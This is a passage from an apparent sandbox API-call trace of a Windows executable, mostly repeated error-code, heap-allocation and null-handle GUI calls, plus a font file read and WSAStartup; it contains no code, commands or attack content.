(dwErrCode=0x0) [0175.673] GetLastError () returned 0x0 [0175.674] SetLastError (dwErrCode=0x0) [0175.674] GetLastError () returned 0x0 [0175.674] SetLastError (dwErrCode=0x0) [0175.674] GetLastError () returned 0x0 [0175.674] SetLastError (dwErrCode=0x0) [0175.674] GetLastError () returned 0x0 [0175.674] SetLastError (dwErrCode=0x0) [0175.674] GetLastError () returned 0x0 [0175.674] SetLastError (dwErrCode=0x0) [0175.674] GetLastError () returned 0x0 [0175.674] SetLastError (dwErrCode=0x0) [0175.674] GetLastError () returned 0x0 [0175.674] SetLastError (dwErrCode=0x0) [0175.674] GetLastError () returned 0x0 [0175.674] SetLastError (dwErrCode=0x0) [0175.674] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x3e) returned 0x3841990 [0175.674] GetLastError () returned 0x0 [0175.674] SetLastError (dwErrCode=0x0) [0175.674] GetLastError () returned 0x0 [0175.674] SetLastError (dwErrCode=0x0) [0175.674] GetLastError () returned 0x0 [0175.675] SetLastError (dwErrCode=0x0) [0175.675] GetLastError () returned 0x0 [0175.675] SetLastError (dwErrCode=0x0) [0175.675] GetLastError () returned 0x0 [0175.675] SetLastError (dwErrCode=0x0) [0175.675] GetLastError () returned 0x0 [0175.675] SetLastError (dwErrCode=0x0) [0175.675] GetLastError () returned 0x0 [0175.675] SetLastError (dwErrCode=0x0) [0175.675] GetLastError () returned 0x0 [0175.675] SetLastError (dwErrCode=0x0) [0175.675] GetLastError () returned 0x0 [0175.675] SetLastError (dwErrCode=0x0) [0175.675] GetLastError () returned 0x0 [0175.675] SetLastError (dwErrCode=0x0) [0175.675] GetLastError () returned 0x0 [0175.675] SetLastError (dwErrCode=0x0) [0175.675] GetLastError () returned 0x0 [0175.675] SetLastError (dwErrCode=0x0) [0175.675] GetLastError () returned 0x0 [0175.675] SetLastError (dwErrCode=0x0) [0175.675] GetLastError () returned 0x0 [0175.676] SetLastError (dwErrCode=0x0) [0175.676] GetLastError () returned 0x0 [0175.676] SetLastError (dwErrCode=0x0) [0175.676] GetLastError () returned 0x0 [0175.676] SetLastError (dwErrCode=0x0) [0175.676] GetLastError () returned 0x0 [0175.676] SetLastError (dwErrCode=0x0) [0175.676] GetLastError () returned 0x0 [0175.676] SetLastError (dwErrCode=0x0) [0175.676] GetLastError () returned 0x0 [0175.676] SetLastError (dwErrCode=0x0) [0175.676] GetLastError () returned 0x0 [0175.676] SetLastError (dwErrCode=0x0) [0175.676] GetLastError () returned 0x0 [0175.676] SetLastError (dwErrCode=0x0) [0175.676] GetLastError () returned 0x0 [0175.676] SetLastError (dwErrCode=0x0) [0175.676] GetLastError () returned 0x0 [0175.676] SetLastError (dwErrCode=0x0) [0175.676] GetLastError () returned 0x0 [0175.676] SetLastError (dwErrCode=0x0) [0175.676] GetLastError () returned 0x0 [0175.676] SetLastError (dwErrCode=0x0) [0175.676] GetLastError () returned 0x0 [0175.677] SetLastError (dwErrCode=0x0) [0175.677] GetLastError () returned 0x0 [0175.677] SetLastError (dwErrCode=0x0) [0175.677] GetLastError () returned 0x0 [0175.677] SetLastError (dwErrCode=0x0) [0175.677] GetLastError () returned 0x0 [0175.677] SetLastError (dwErrCode=0x0) [0175.677] GetLastError () returned 0x0 [0175.677] SetLastError (dwErrCode=0x0) [0175.677] GetLastError () returned 0x0 [0175.677] SetLastError (dwErrCode=0x0) [0175.677] GetLastError () returned 0x0 [0175.677] SetLastError (dwErrCode=0x0) [0175.677] GetLastError () returned 0x0 [0175.677] SetLastError (dwErrCode=0x0) [0175.677] GetLastError () returned 0x0 [0175.677] SetLastError (dwErrCode=0x0) [0175.677] GetLastError () returned 0x0 [0175.677] SetLastError (dwErrCode=0x0) [0175.677] GetLastError () returned 0x0 [0175.677] SetLastError (dwErrCode=0x0) [0175.677] GetLastError () returned 0x0 [0175.677] SetLastError (dwErrCode=0x0) [0175.677] GetLastError () returned 0x0 [0175.678] SetLastError (dwErrCode=0x0) [0175.678] GetLastError () returned 0x0 [0175.678] SetLastError (dwErrCode=0x0) [0175.678] GetLastError () returned 0x0 [0175.678] SetLastError (dwErrCode=0x0) [0175.678] GetLastError () returned 0x0 [0175.678] SetLastError (dwErrCode=0x0) [0175.678] GetLastError () returned 0x0 [0175.678] SetLastError (dwErrCode=0x0) [0175.678] GetLastError () returned 0x0 [0175.678] SetLastError (dwErrCode=0x0) [0175.678] GetLastError () returned 0x0 [0175.678] SetLastError (dwErrCode=0x0) [0175.678] GetLastError () returned 0x0 [0175.678] SetLastError (dwErrCode=0x0) [0175.678] GetLastError () returned 0x0 [0175.678] SetLastError (dwErrCode=0x0) [0175.678] GetLastError () returned 0x0 [0175.678] SetLastError (dwErrCode=0x0) [0175.678] GetLastError () returned 0x0 [0175.678] SetLastError (dwErrCode=0x0) [0175.678] GetLastError () returned 0x0 [0175.678] SetLastError (dwErrCode=0x0) [0175.678] GetLastError () returned 0x0 [0175.679] SetLastError (dwErrCode=0x0) [0175.679] GetLastError () returned 0x0 [0175.679] SetLastError (dwErrCode=0x0) [0175.679] GetLastError () returned 0x0 [0175.679] SetLastError (dwErrCode=0x0) [0175.679] GetLastError () returned 0x0 [0175.679] SetLastError (dwErrCode=0x0) [0175.679] GetLastError () returned 0x0 [0175.679] SetLastError (dwErrCode=0x0) [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x98) returned 0x38419d8 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x1f) returned 0x3841a78 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x36) returned 0x3841aa0 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x37) returned 0x3841ae0 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x3c) returned 0x3841b20 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x31) returned 0x3841b68 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x17) returned 0x3841ba8 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x24) returned 0x3841bc8 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x14) returned 0x3841bf8 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0xd) returned 0x3841c18 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x25) returned 0x3841c30 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x39) returned 0x3841c60 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x18) returned 0x3841ca8 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x17) returned 0x3841cc8 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0xe) returned 0x3841ce8 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x69) returned 0x3841d00 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x3e) returned 0x3841d78 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x1b) returned 0x3841dc0 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x1d) returned 0x3841de8 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x48) returned 0x3841e10 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x12) returned 0x3841e60 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x18) returned 0x3841e80 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x1b) returned 0x3841ea0 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x24) returned 0x3841ec8 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x29) returned 0x3841ef8 [0175.679] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x1e) returned 0x3841f30 [0175.680] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x41) returned 0x3841f58 [0175.680] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x17) returned 0x3841fa8 [0175.680] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0xf) returned 0x3841fc8 [0175.680] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x16) returned 0x3841fe8 [0175.680] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x2a) returned 0x3842008 [0175.680] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x29) returned 0x3842040 [0175.680] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x15) returned 0x3842078 [0175.680] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x1e) returned 0x3842098 [0175.680] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x2a) returned 0x38420c0 [0175.680] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x12) returned 0x38420f8 [0175.680] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x18) returned 0x3842118 [0175.703] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x46) returned 0x3842138 [0175.703] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x38411f8 | out: hHeap=0x3840000) returned 1 [0175.703] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0175.703] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x800) returned 0x3842188 [0175.704] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x8, Size=0x80) returned 0x38411f8 [0175.704] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0175.704] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40bbc8) returned 0x0 [0175.705] RtlSizeHeap (HeapHandle=0x3840000, Flags=0x0, MemoryPointer=0x38411f8) returned 0x80 [0175.706] GetLastError () returned 0x0 [0175.706] SetLastError (dwErrCode=0x0) [0175.706] GetLastError () returned 0x0 [0175.706] SetLastError (dwErrCode=0x0) [0175.706] GetLastError () returned 0x0 [0175.706] SetLastError (dwErrCode=0x0) [0175.706] GetLastError () returned 0x0 [0175.706] SetLastError (dwErrCode=0x0) [0175.706] GetLastError () returned 0x0 [0175.706] SetLastError (dwErrCode=0x0) [0175.706] GetLastError () returned 0x0 [0175.706] SetLastError (dwErrCode=0x0) [0175.706] GetLastError () returned 0x0 [0175.706] SetLastError (dwErrCode=0x0) [0175.706] GetLastError () returned 0x0 [0175.706] SetLastError (dwErrCode=0x0) [0175.706] GetLastError () returned 0x0 [0175.706] SetLastError (dwErrCode=0x0) [0175.706] GetLastError () returned 0x0 [0175.706] SetLastError (dwErrCode=0x0) [0175.706] GetLastError () returned 0x0 [0175.707] SetLastError (dwErrCode=0x0) [0175.707] GetLastError () returned 0x0 [0175.707] SetLastError (dwErrCode=0x0) [0175.707] GetLastError () returned 0x0 [0175.707] SetLastError (dwErrCode=0x0) [0175.707] GetLastError () returned 0x0 [0175.707] SetLastError (dwErrCode=0x0) [0175.707] GetLastError () returned 0x0 [0175.707] SetLastError (dwErrCode=0x0) [0175.707] GetLastError () returned 0x0 [0175.707] SetLastError (dwErrCode=0x0) [0175.707] GetLastError () returned 0x0 [0175.707] SetLastError (dwErrCode=0x0) [0175.707] GetLastError () returned 0x0 [0175.707] SetLastError (dwErrCode=0x0) [0175.707] GetLastError () returned 0x0 [0175.707] SetLastError (dwErrCode=0x0) [0175.707] GetLastError () returned 0x0 [0175.707] SetLastError (dwErrCode=0x0) [0175.707] GetLastError () returned 0x0 [0175.707] SetLastError (dwErrCode=0x0) [0175.707] GetLastError () returned 0x0 [0175.707] SetLastError (dwErrCode=0x0) [0175.707] GetLastError () returned 0x0 [0175.707] SetLastError (dwErrCode=0x0) [0175.708] GetLastError () returned 0x0 [0175.708] SetLastError (dwErrCode=0x0) [0175.708] GetLastError () returned 0x0 [0175.708] SetLastError (dwErrCode=0x0) [0175.708] GetLastError () returned 0x0 [0175.708] SetLastError (dwErrCode=0x0) [0175.708] GetLastError () returned 0x0 [0175.708] SetLastError (dwErrCode=0x0) [0175.708] GetLastError () returned 0x0 [0175.708] SetLastError (dwErrCode=0x0) [0175.708] GetLastError () returned 0x0 [0175.708] SetLastError (dwErrCode=0x0) [0175.708] GetLastError () returned 0x0 [0175.708] SetLastError (dwErrCode=0x0) [0175.708] GetLastError () returned 0x0 [0175.708] SetLastError (dwErrCode=0x0) [0175.708] GetLastError () returned 0x0 [0175.708] SetLastError (dwErrCode=0x0) [0175.708] GetLastError () returned 0x0 [0175.708] SetLastError (dwErrCode=0x0) [0175.708] GetLastError () returned 0x0 [0175.708] SetLastError (dwErrCode=0x0) [0175.708] GetLastError () returned 0x0 [0175.709] SetLastError (dwErrCode=0x0) [0175.709] GetLastError () returned 0x0 [0175.709] SetLastError (dwErrCode=0x0) [0175.709] GetLastError () returned 0x0 [0175.709] SetLastError (dwErrCode=0x0) [0175.709] GetLastError () returned 0x0 [0175.709] SetLastError (dwErrCode=0x0) [0175.709] GetLastError () returned 0x0 [0175.709] SetLastError (dwErrCode=0x0) [0175.709] GetLastError () returned 0x0 [0175.709] SetLastError (dwErrCode=0x0) [0175.709] GetLastError () returned 0x0 [0175.709] SetLastError (dwErrCode=0x0) [0175.709] GetLastError () returned 0x0 [0175.709] SetLastError (dwErrCode=0x0) [0175.709] GetLastError () returned 0x0 [0175.709] SetLastError (dwErrCode=0x0) [0175.709] GetLastError () returned 0x0 [0175.709] SetLastError (dwErrCode=0x0) [0175.709] GetLastError () returned 0x0 [0175.709] SetLastError (dwErrCode=0x0) [0175.709] GetLastError () returned 0x0 [0175.709] SetLastError (dwErrCode=0x0) [0175.709] GetLastError () returned 0x0 [0175.709] SetLastError (dwErrCode=0x0) [0175.710] GetLastError () returned 0x0 [0175.710] SetLastError (dwErrCode=0x0) [0175.710] GetLastError () returned 0x0 [0175.710] SetLastError (dwErrCode=0x0) [0175.710] GetLastError () returned 0x0 [0175.710] SetLastError (dwErrCode=0x0) [0175.710] GetLastError () returned 0x0 [0175.710] SetLastError (dwErrCode=0x0) [0175.710] GetLastError () returned 0x0 [0175.710] SetLastError (dwErrCode=0x0) [0175.710] GetLastError () returned 0x0 [0175.710] SetLastError (dwErrCode=0x0) [0175.710] GetLastError () returned 0x0 [0175.710] SetLastError (dwErrCode=0x0) [0175.710] GetLastError () returned 0x0 [0175.710] SetLastError (dwErrCode=0x0) [0175.710] GetWindowsDirectoryA (in: lpBuffer=0x18fdb8, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0175.710] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x18) returned 0x3841280 [0175.711] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x18) returned 0x38412a0 [0175.711] CreateFileA (lpFileName="C:\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18fc00, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0175.711] GetFileType (hFile=0xd0) returned 0x1 [0175.711] ReadFile (in: hFile=0xd0, lpBuffer=0x421720, nNumberOfBytesToRead=0xf4000, lpNumberOfBytesRead=0x18fc30, lpOverlapped=0x0 | out: lpBuffer=0x421720*, lpNumberOfBytesRead=0x18fc30*=0xb6cb0, lpOverlapped=0x0) returned 1 [0175.719] ReadFile (in: hFile=0xd0, lpBuffer=0x4d83d0, nNumberOfBytesToRead=0x3d000, lpNumberOfBytesRead=0x18fc30, lpOverlapped=0x0 | out: lpBuffer=0x4d83d0*, lpNumberOfBytesRead=0x18fc30*=0x0, lpOverlapped=0x0) returned 1 [0175.719] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8c) returned 0x38412c0 [0175.719] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841358 [0175.719] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x60) returned 0x3841368 [0175.719] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x104) returned 0x38413d0 [0175.719] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x14) returned 0x38414e0 [0175.719] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x14) returned 0x3841500 [0175.719] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x38414e0 | out: hHeap=0x3840000) returned 1 [0175.719] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841500 | out: hHeap=0x3840000) returned 1 [0175.719] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x14) returned 0x38414e0 [0175.719] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x14) returned 0x3841500 [0175.719] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841500 | out: hHeap=0x3840000) returned 1 [0175.719] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x38414e0 | out: hHeap=0x3840000) returned 1 [0175.719] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x14) returned 0x38414e0 [0175.719] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x14) returned 0x3841500 [0175.719] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841500 | out: hHeap=0x3840000) returned 1 [0175.719] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x38414e0 | out: hHeap=0x3840000) returned 1 [0175.719] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x38413d0 | out: hHeap=0x3840000) returned 1 [0175.719] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841358 | out: hHeap=0x3840000) returned 1 [0175.719] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841368 | out: hHeap=0x3840000) returned 1 [0175.719] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x38412c0 | out: hHeap=0x3840000) returned 1 [0175.719] CreateMenu () returned 0x300b3 [0175.719] LoadMenuA (hInstance=0x400000, lpMenuName="Menu") returned 0x0 [0175.720] LoadBitmapA (hInstance=0x400000, lpBitmapName="Bitmap") returned 0x0 [0175.720] AppendMenuA (hMenu=0x300b3, uFlags=0x14, uIDNewItem=0x0, lpNewItem=0x0) returned 1 [0175.721] LoadMenuA (hInstance=0x400000, lpMenuName="Edit") returned 0x0 [0175.721] CryptCATGetMemberInfo () returned 0x0 [0175.721] GetDeviceCaps (hdc=0x0, index=112) returned 0 [0175.721] GetDeviceCaps (hdc=0x0, index=88) returned 0 [0175.721] GetDeviceCaps (hdc=0x0, index=113) returned 0 [0175.721] GetDeviceCaps (hdc=0x0, index=90) returned 0 [0175.721] GetDeviceCaps (hdc=0x0, index=110) returned 0 [0175.721] GetDeviceCaps (hdc=0x0, index=88) returned 0 [0175.721] GetDeviceCaps (hdc=0x0, index=112) returned 0 [0175.721] GetDeviceCaps (hdc=0x0, index=111) returned 0 [0175.721] GetDeviceCaps (hdc=0x0, index=90) returned 0 [0175.721] GetDeviceCaps (hdc=0x0, index=113) returned 0 [0175.721] IsWindowEnabled (hWnd=0x0) returned 0 [0175.721] IsWindowEnabled (hWnd=0x0) returned 0 [0175.721] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] IsWindowEnabled (hWnd=0x0) returned 0 [0175.722] SetPixelFormat (hdc=0x0, format=12, ppfd=0x18fb10) returned 0 [0176.007] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x18fb94 | out: lpWSAData=0x18fb94) returned 0 [0176.015] SendMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0176.015] GetLastError () returned 0x578 [0176.015] CreateICA (pszDriver="DISPLAY", pszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0xa010762 [0176.015] OleTranslateColor () returned 0x0 [0176.015] SecurityDescriptorToBinarySD (vVarSecDes=0x18fa98, ppSecurityDescriptor=0x18faf8, pdwSDLength=0x18fb4c, pszServerName=0x0, userName=0x0, passWord=0x0, dwFlags=0x0) returned 0x80004005 [0176.016] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x38412c0 [0176.016] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x38412d0 [0176.016] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x38412f8 [0176.016] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.016] BinarySDToSecurityDescriptor (pSecurityDescriptor=0x0, pVarsec=0x18fafc, pszServerName=0x0, userName=0x0, passWord=0x0, dwFlags=0x0) returned 0x80004005 [0176.016] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.016] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.016] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.016] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.016] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.016] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.016] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.016] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.016] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.016] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.016] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.016] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.016] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.016] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.016] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.016] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.016] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.016] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.016] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.016] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.016] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.016] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.016] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.017] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.017] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.017] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.017] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.017] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: 